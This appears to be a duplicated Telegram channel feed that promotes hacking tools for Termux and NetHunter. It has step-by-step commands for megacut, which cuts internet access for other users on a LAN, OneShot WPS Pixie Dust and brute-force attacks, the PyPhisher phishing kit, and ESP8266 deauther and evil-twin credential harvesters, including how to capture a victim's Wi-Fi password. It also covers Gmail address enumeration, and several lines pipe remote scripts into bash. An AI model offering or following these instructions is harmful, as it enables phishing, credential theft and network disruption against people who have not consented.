¶¶ megacut
A new powerful Python3 tool for managing internet on a local network
📍git clone https://github.com/stryker-project/megacut
📍cd megacut
📍pip install -r requirements.txt
📍python3 megacut.py
¶¶ Options & Syntax
python3 megacut.py target gateway -m\-k\-b\-r
-k Kill inet on target ip
-m Permanently disable inet on target (only if -k not works)
-b Disable inet for 20 seconds
-r Restore inet on target ip
¶¶ Examples:
python3 megacut.py 192.168.1.101 192.168.1.1 -k
A new powerful Python3 tool for managing internet on a local network
📍git clone https://github.com/stryker-project/megacut
📍cd megacut
📍pip install -r requirements.txt
📍python3 megacut.py
¶¶ Options & Syntax
python3 megacut.py target gateway -m\-k\-b\-r
-k Kill inet on target ip
-m Permanently disable inet on target (only if -k not works)
-b Disable inet for 20 seconds
-r Restore inet on target ip
¶¶ Examples:
python3 megacut.py 192.168.1.101 192.168.1.1 -k
👍1
Forwarded from Cyryx college
Media is too big
VIEW IN TELEGRAM
¶¶Install ngrok on termux
Open chrome
¶¶Go to
https://dashboard.ngrok.com/signup
Signup with a new gmail
aftee that go to termux and copy past this
📍wget https://bin.equinox.io/c/bNyj1mQVY4c/ngrok-v3-stable-linux-arm64.tgz
¶¶ when download is completed
( to extract it type )
📍tar vxzf ngrok-v3-stable-linux-arm64.tgz
¶¶Now go back to chrome ngrok page and lets add our ngrok token copy it full
Example = ngrok config add-authtoken 55NulkHPoB9SsymNPp6U1ewIX2m_3bZakfrsceXpQR1gkay4L
( add ./ after that full link )
¶¶Go back to termux and past i with ./
📍./ngrok config add-authtoken 55NulkHPoB9SsymNPp6U1ewIX2m_3bZakfrsceXpQR1gkay4L
(Open Hotspot in your phone ) before using
Open chrome
¶¶Go to
https://dashboard.ngrok.com/signup
Signup with a new gmail
aftee that go to termux and copy past this
📍wget https://bin.equinox.io/c/bNyj1mQVY4c/ngrok-v3-stable-linux-arm64.tgz
¶¶ when download is completed
( to extract it type )
📍tar vxzf ngrok-v3-stable-linux-arm64.tgz
¶¶Now go back to chrome ngrok page and lets add our ngrok token copy it full
Example = ngrok config add-authtoken 55NulkHPoB9SsymNPp6U1ewIX2m_3bZakfrsceXpQR1gkay4L
( add ./ after that full link )
¶¶Go back to termux and past i with ./
📍./ngrok config add-authtoken 55NulkHPoB9SsymNPp6U1ewIX2m_3bZakfrsceXpQR1gkay4L
(Open Hotspot in your phone ) before using
👍1
¶¶ Seema
#wordlist
a random password generator tool which generates a random password of your choice. If you wants easy password, then it will generate a random easy password and give you and ask from you whether you wants to save or not. If you doesn't want to save your password and it will stop processing but if you wants to save your password then, it will ask from you a name for your password.
📍apt-get update && apt-get upgrade -y
📍apt-get install python git -y
📍git clone https://github.com/adarshaddee/Seema.git
📍cd Seema
📍chmod +x setup.sh
📍./setup.sh
OR YOU CAN USE
📍pip install -r requirements.txt
📍python Seema.py
------------------------------------------------
Random-Password-Generator
Program written by Python Language
Requirements
apt update && apt upgrade pkg install python pip install requests
Run
cd Random-Password-Generator python gen_rand_passwd.py
#wordlist
a random password generator tool which generates a random password of your choice. If you wants easy password, then it will generate a random easy password and give you and ask from you whether you wants to save or not. If you doesn't want to save your password and it will stop processing but if you wants to save your password then, it will ask from you a name for your password.
📍apt-get update && apt-get upgrade -y
📍apt-get install python git -y
📍git clone https://github.com/adarshaddee/Seema.git
📍cd Seema
📍chmod +x setup.sh
📍./setup.sh
OR YOU CAN USE
📍pip install -r requirements.txt
📍python Seema.py
------------------------------------------------
Random-Password-Generator
Program written by Python Language
Requirements
apt update && apt upgrade pkg install python pip install requests
Run
cd Random-Password-Generator python gen_rand_passwd.py
This media is not supported in your browser
VIEW IN TELEGRAM
WPS PIN attacks Pixie Dust, online bruteforce, without monitor mode with the wpa_supplicant
Using installer
curl -sSf https://raw.githubusercontent.com/drygdryg/OneShot_Termux_installer/master/installer.sh | bash
¶¶ Manually Installing requirements
📍pkg install -y root-repo
📍pkg install -y git tsu python
📍wpa-supplicant pixiewps iw
¶¶ Getting OneShot
📍git clone --depth 1 https://github.com/drygdryg/OneShot OneShot
¶¶ Running
📍sudo python OneShot/oneshot.py -i wlan0 --iface-down -K
¶¶ Start Pixie Dust attack on a specified BSSID:
📍sudo python3 oneshot.py -i wlan0 -b 00:90:4C:C1:AC:21 -K
¶¶ Show avaliable networks and start
📍sudo python3 oneshot.py -i wlan0 -K
¶¶ Launch online WPS bruteforce
📍sudo python3 oneshot.py -i wlan0 -b 00:90:4C:C1:AC:21 -B -p 1234
¶¶ Start WPS push button connection:s
📍sudo python3 oneshot.py -i wlan0 --pbc
¶¶ Troubleshooting check this link below and give it a try it .tested on samsung note10 plus / and as u can see it works for me
📍https://github.com/drygdryg/OneShot
Using installer
curl -sSf https://raw.githubusercontent.com/drygdryg/OneShot_Termux_installer/master/installer.sh | bash
¶¶ Manually Installing requirements
📍pkg install -y root-repo
📍pkg install -y git tsu python
📍wpa-supplicant pixiewps iw
¶¶ Getting OneShot
📍git clone --depth 1 https://github.com/drygdryg/OneShot OneShot
¶¶ Running
📍sudo python OneShot/oneshot.py -i wlan0 --iface-down -K
¶¶ Start Pixie Dust attack on a specified BSSID:
📍sudo python3 oneshot.py -i wlan0 -b 00:90:4C:C1:AC:21 -K
¶¶ Show avaliable networks and start
📍sudo python3 oneshot.py -i wlan0 -K
¶¶ Launch online WPS bruteforce
📍sudo python3 oneshot.py -i wlan0 -b 00:90:4C:C1:AC:21 -B -p 1234
¶¶ Start WPS push button connection:s
📍sudo python3 oneshot.py -i wlan0 --pbc
¶¶ Troubleshooting check this link below and give it a try it .tested on samsung note10 plus / and as u can see it works for me
📍https://github.com/drygdryg/OneShot
👍1
¶¶ wpspin
WPS PIN generator uses known MAC address based algorithms commonly found in routers firmware to generate their default PINs. The PIN can be used with programs like Reaver, Bully or OneShot to recover Wi-Fi password.
Installation
📍pip install wpspin
Or you can install from source with:
📍git clone https://github.com/drygdryg/wpspin.git
📍cd wpspin/
📍python setup.py install
Example:
📍$ wpspin 54:A0:50:75:D2:40
WPS PIN generator uses known MAC address based algorithms commonly found in routers firmware to generate their default PINs. The PIN can be used with programs like Reaver, Bully or OneShot to recover Wi-Fi password.
Installation
📍pip install wpspin
Or you can install from source with:
📍git clone https://github.com/drygdryg/wpspin.git
📍cd wpspin/
📍python setup.py install
Example:
📍$ wpspin 54:A0:50:75:D2:40
❤1
Media is too big
VIEW IN TELEGRAM
¶¶ PyPhisher /65Tools
#phishing #socialmedia #kalinethunter #termux
Ultimate phishing tool in python. Includes popular websites like facebook, twitter, instagram, github, reddit, gmail and many others
git clone https://github.com/KasRoudra/PyPhisher
cd PyPhisher
python3 pyphisher.py
¶¶ Or, directly run
wget https://raw.githubusercontent.com/KasRoudra/PyPhisher/main/pyphisher.py && python3 pyphisher.py
#phishing #socialmedia #kalinethunter #termux
Ultimate phishing tool in python. Includes popular websites like facebook, twitter, instagram, github, reddit, gmail and many others
git clone https://github.com/KasRoudra/PyPhisher
cd PyPhisher
python3 pyphisher.py
¶¶ Or, directly run
wget https://raw.githubusercontent.com/KasRoudra/PyPhisher/main/pyphisher.py && python3 pyphisher.py
¶¶ Golismero
Web Application Vulnerability Scanner
sudo bash
apt-get install python2.7 python2.7-dev python-pip python-docutils git perl nmap sslscan cd /opt
git clone https://github.com/golismero/golismero.git
cd golismero
pip install -r requirements.txt pip install -r requirements_unix.txt
ln -s /opt/golismero/golismero.py /usr/bin/golismero
exit
Web Application Vulnerability Scanner
sudo bash
apt-get install python2.7 python2.7-dev python-pip python-docutils git perl nmap sslscan cd /opt
git clone https://github.com/golismero/golismero.git
cd golismero
pip install -r requirements.txt pip install -r requirements_unix.txt
ln -s /opt/golismero/golismero.py /usr/bin/golismero
exit
❤1👍1
¶¶ JFScan lets you utilize Masscan to scan for open ports and use Nmap scripts on discovered ports to scan for services. JFScan allows you to run a scan of many different targets using the targets flag(-t) followed by a text file with the domain/IP/URL listed inside.
📍sudo apt install libpcap-dev git clone https://github.com/robertdavidgraham/masscan
📍cd masscan
📍make
📍sudo make install
📍sudo setcap CAP_NET_RAW+ep /usr/bin/masscan
¶¶ to install JFScan back in your home directory
📍cd ~
📍git clone https://github.com/nullt3r/jfscan.git $ 📍cd jfscan
📍pip3 install .
usage:
jfscan [-h] -t TARGETS [--resolvers RESOLVERS] [-m MODULES] (-p PORTS | -tp TOP_PORTS) [-r MAX_RATE] [-oi] [-od] [-q] [--nmap] [--nmap-options NMAP_OPTIONS] [--nmap-threads NMAP_THREADS] [--nmap-output NMAP_OUTPUT]
📍sudo apt install libpcap-dev git clone https://github.com/robertdavidgraham/masscan
📍cd masscan
📍make
📍sudo make install
📍sudo setcap CAP_NET_RAW+ep /usr/bin/masscan
¶¶ to install JFScan back in your home directory
📍cd ~
📍git clone https://github.com/nullt3r/jfscan.git $ 📍cd jfscan
📍pip3 install .
usage:
jfscan [-h] -t TARGETS [--resolvers RESOLVERS] [-m MODULES] (-p PORTS | -tp TOP_PORTS) [-r MAX_RATE] [-oi] [-od] [-q] [--nmap] [--nmap-options NMAP_OPTIONS] [--nmap-threads NMAP_THREADS] [--nmap-output NMAP_OUTPUT]
¶¶ sherlock
#sherlock #socialmedia #info #nethunter #termux
📍git clone https://github.com/sherlock-project/sherlock.git
📍cd sherlock
📍python3 -m pip install -r requirements.txt
📍python3 sherlock --help
¶¶ To search for only one user:
📍python3 sherlock user123
¶¶ To search for more than one user:
📍python3 sherlock user1 user2 user3
#sherlock #socialmedia #info #nethunter #termux
📍git clone https://github.com/sherlock-project/sherlock.git
📍cd sherlock
📍python3 -m pip install -r requirements.txt
📍python3 sherlock --help
¶¶ To search for only one user:
📍python3 sherlock user123
¶¶ To search for more than one user:
📍python3 sherlock user1 user2 user3
¶¶ This package contains the rockyou.txt wordlist and has an installation size of 134 MB.
#wordlist #rockyou #fern
📍sudo apt install wordlists
📍wordlists -h
> wordlists ~ Contains the rockyou wordlist /usr/share/wordlists
|--dirb |--dirbuster
|--dnsmap.txt
|--fasttrack.txt
|--fern-wifi
|--metasploit
|--nmap.lst
|--rockyou.txt.gz
|--seclists
|--wfuzz
#wordlist #rockyou #fern
📍sudo apt install wordlists
📍wordlists -h
> wordlists ~ Contains the rockyou wordlist /usr/share/wordlists
|--dirb |--dirbuster
|--dnsmap.txt
|--fasttrack.txt
|--fern-wifi
|--metasploit
|--nmap.lst
|--rockyou.txt.gz
|--seclists
|--wfuzz
#pyrit erro fix
#wifte
¶¶ If you run into any problems installing Pyrit. You may need to install the following packages and reinstall.
📍apt install python2 build-essential python2-dev libpcap-dev libssl-dev
installation:-
📍git clone https://github.com/JPaulMora/Pyrit.git;cd Pyrit
📍python2 setup.py clean;sudo python2 setup.py build;sudo python2 setup.py install
#wifte
¶¶ If you run into any problems installing Pyrit. You may need to install the following packages and reinstall.
📍apt install python2 build-essential python2-dev libpcap-dev libssl-dev
installation:-
📍git clone https://github.com/JPaulMora/Pyrit.git;cd Pyrit
📍python2 setup.py clean;sudo python2 setup.py build;sudo python2 setup.py install
Deleted Account
Nethunter permission error fix Download the file (nethunter.sh) Open terminal AndroidSu type su sd sdcard or /sdcard sh nethunter.sh when you see done (restart device your nethunter will work got this error on latest version and fixed on samsung note 10…
¶¶ put this on androidsu
copy & past in androidsu
pm grant com.offsec.nethunter android.permission.ACCESS_FINE_LOCATION
pm grant com.offsec.nethunter android.permission.ACCESS_COARSE_LOCATION
pm grant com.offsec.nethunter android.permission.READ_EXTERNAL_STORAGE
pm grant com.offsec.nethunter android.permission.WRITE_EXTERNAL_STORAGE
pm grant com.offsec.nethunter com.offsec.nhterm.permission.RUN_SCRIPT
pm grant com.offsec.nethunter com.offsec.nhterm.permission.RUN_SCRIPT_SU
pm grant com.offsec.nethunter com.offsec.nhterm.permission.RUN_SCRIPT_NH
pm grant com.offsec.nethunter com.offsec.nhterm.permission.RUN_SCRIPT_NH_LOGIN
copy & past in androidsu
pm grant com.offsec.nethunter android.permission.ACCESS_FINE_LOCATION
pm grant com.offsec.nethunter android.permission.ACCESS_COARSE_LOCATION
pm grant com.offsec.nethunter android.permission.READ_EXTERNAL_STORAGE
pm grant com.offsec.nethunter android.permission.WRITE_EXTERNAL_STORAGE
pm grant com.offsec.nethunter com.offsec.nhterm.permission.RUN_SCRIPT
pm grant com.offsec.nethunter com.offsec.nhterm.permission.RUN_SCRIPT_SU
pm grant com.offsec.nethunter com.offsec.nhterm.permission.RUN_SCRIPT_NH
pm grant com.offsec.nethunter com.offsec.nhterm.permission.RUN_SCRIPT_NH_LOGIN
👍2
Termux
¶¶ ESP8266-CH340 Developmemt board Its like a wifi jammer & Disconnect all nearby wifi . #NodeMCU #5v Scan for WiFi devices, block selected connections, create dozens of networks and confuse WiFi scanners install drivers (windows) according to your item…
Media is too big
VIEW IN TELEGRAM
#update
#ESP8266 #CH340 #nodemcu
Scan for WiFi devices, block selected connections, create dozens of networks and confuse WiFi scanners!
ESP8266 Deauther Version 2
https://github.com/SpacehuhnTech/esp8266_deauther
#Android
https://play.google.com/store/apps/details?id=com.bluino.esploader
#ESP8266 #CH340 #nodemcu
Scan for WiFi devices, block selected connections, create dozens of networks and confuse WiFi scanners!
ESP8266 Deauther Version 2
https://github.com/SpacehuhnTech/esp8266_deauther
#Android
https://play.google.com/store/apps/details?id=com.bluino.esploader
ESP8266-Fluxion.ino.nodemcu.bin
256 KB
¶¶ Fluxion-on-esp8266
This is a Advance Fluxion tool on esp8266...
#esp8266
¶¶ Connect to the AP named "M1z23R" with password:- "deauther" from your phone/PC.
¶¶ in chrome browser open 192.168.4.1
¶¶ You will see list of target (nearby )
¶¶ select your target
¶¶ click on deauthing
¶¶ after that click on evil twin attack
¶¶ check wifi .You will see open network with victim ssid .when victims enter correct password it will close and change to "M1z23R" again open in chrome browser 192.168.4.1 below will be the password
¶¶ Readme: https://github.com/pitube08642/Fluxion-on-ESP8266
¶¶ android app ( if you get error move on to pc )
¶¶ Android application
https://play.google.com/store/apps/details?id=com.bluino.esploader
This is a Advance Fluxion tool on esp8266...
#esp8266
¶¶ Connect to the AP named "M1z23R" with password:- "deauther" from your phone/PC.
¶¶ in chrome browser open 192.168.4.1
¶¶ You will see list of target (nearby )
¶¶ select your target
¶¶ click on deauthing
¶¶ after that click on evil twin attack
¶¶ check wifi .You will see open network with victim ssid .when victims enter correct password it will close and change to "M1z23R" again open in chrome browser 192.168.4.1 below will be the password
¶¶ Readme: https://github.com/pitube08642/Fluxion-on-ESP8266
¶¶ android app ( if you get error move on to pc )
¶¶ Android application
https://play.google.com/store/apps/details?id=com.bluino.esploader
ESP_Code.ino.generic.bin
340.2 KB
¶¶ esp8266
ESPortalV2 is a WiFi Captive Portal Credential Harvester (Phisher) for ESP8266 Devices. Fake a "Free WiFi HotSpot" with spoofed login pages.
¶¶ SSID: "Free WiFi"
URL: http://192.168.1.1/esportal
¶¶ username "admin"
password "hacktheplanet"
¶¶ Readme : https://github.com/exploitagency/ESPortalV2
ESPortalV2 is a WiFi Captive Portal Credential Harvester (Phisher) for ESP8266 Devices. Fake a "Free WiFi HotSpot" with spoofed login pages.
¶¶ SSID: "Free WiFi"
URL: http://192.168.1.1/esportal
¶¶ username "admin"
password "hacktheplanet"
¶¶ Readme : https://github.com/exploitagency/ESPortalV2
espbug.bin
499.5 KB
¶¶ esp
#cafey
ESPBug is a rogue captive portal program which runs on the ESP8266 dev board, such as the NodeMCU (clones included). It is a social engennering tool which generates a WiFi network of a given name alluring people to connect to it and enter some credentials.
When you connect to the ESPBug, go to any domain name and to the espportal page (e.g. http://espbug.com/espportal) You should be shown a pop up window asking you for the password. Defaults are Username: espbug and Password: password. From there you are redirected to the home page.
¶¶ Readme : https://www.youtube.com/watch?v=X95rtPqSzw4
#cafey
ESPBug is a rogue captive portal program which runs on the ESP8266 dev board, such as the NodeMCU (clones included). It is a social engennering tool which generates a WiFi network of a given name alluring people to connect to it and enter some credentials.
When you connect to the ESPBug, go to any domain name and to the espportal page (e.g. http://espbug.com/espportal) You should be shown a pop up window asking you for the password. Defaults are Username: espbug and Password: password. From there you are redirected to the home page.
¶¶ Readme : https://www.youtube.com/watch?v=X95rtPqSzw4
Termux
ESP8266-Fluxion.ino.nodemcu.bin
Media is too big
VIEW IN TELEGRAM
¶¶ Fluxion-on-esp8266
This is a Advance Fluxion tool on esp8266...
#esp8266
https://github.com/pitube08642/Fluxion-on-ESP8266
¶¶ android app
https://play.google.com/store/apps/details?id=com.bluino.esploader
¶¶ more info about Esp8266
https://create.arduino.cc/projecthub/Niv_the_anonymous/esp8266-beginner-tutorial-project-6414c8
This is a Advance Fluxion tool on esp8266...
#esp8266
https://github.com/pitube08642/Fluxion-on-ESP8266
¶¶ android app
https://play.google.com/store/apps/details?id=com.bluino.esploader
¶¶ more info about Esp8266
https://create.arduino.cc/projecthub/Niv_the_anonymous/esp8266-beginner-tutorial-project-6414c8
This media is not supported in your browser
VIEW IN TELEGRAM
¶¶ gmailify
This tool validates if gmail addresses and corporate emails with google mail servers are valid without being authenticated. The default thread is 10 to avoid being rate limited.
#gmail #wordlist #gmailvalidchecker
#termux
¶¶ Installation
python -m pip install gmailify
¶¶Check a single gmail address
python -m gmailify -e example@gmail.com
¶¶ Input from file
python -m gmailify -f emails.txt
¶¶Pass through proxy
python -m gmailify -p
This tool validates if gmail addresses and corporate emails with google mail servers are valid without being authenticated. The default thread is 10 to avoid being rate limited.
#gmail #wordlist #gmailvalidchecker
#termux
¶¶ Installation
python -m pip install gmailify
¶¶Check a single gmail address
python -m gmailify -e example@gmail.com
¶¶ Input from file
python -m gmailify -f emails.txt
¶¶Pass through proxy
python -m gmailify -p
❤1
Forwarded from Rose
Install Metasploit in Termux Latest Update (6.1.42). Dated on 06/05/2022
Metasploit Without Error in termux?
First and Final Step: Run The script
source <(curl -fsSl https://raw.githubusercontent.com/efxtv/Metasploit-in-termux/main/metasploit-6-termux.sh)
Note: At the end script will ask you to open a new terminal and test your tool. Press y/n accordingly.
(At the end of the installation, there will be a bash prompt, which will prompt you to open a new terminal in termux and try to run msfconsole (to check if metasploit is working) if that works, then get back to previous terminal (prompt) and press y else (dont work or error after msfconsole) press n , once you press n, termux will automatically look for errors and fix that for you)... demo 👇👇👇
Source here
Visit out blog: Uk2blogger
👉 Video here (must like and share)
Metasploit Without Error in termux?
First and Final Step: Run The script
source <(curl -fsSl https://raw.githubusercontent.com/efxtv/Metasploit-in-termux/main/metasploit-6-termux.sh)
Note: At the end script will ask you to open a new terminal and test your tool. Press y/n accordingly.
(At the end of the installation, there will be a bash prompt, which will prompt you to open a new terminal in termux and try to run msfconsole (to check if metasploit is working) if that works, then get back to previous terminal (prompt) and press y else (dont work or error after msfconsole) press n , once you press n, termux will automatically look for errors and fix that for you)... demo 👇👇👇
Source here
Visit out blog: Uk2blogger
👉 Video here (must like and share)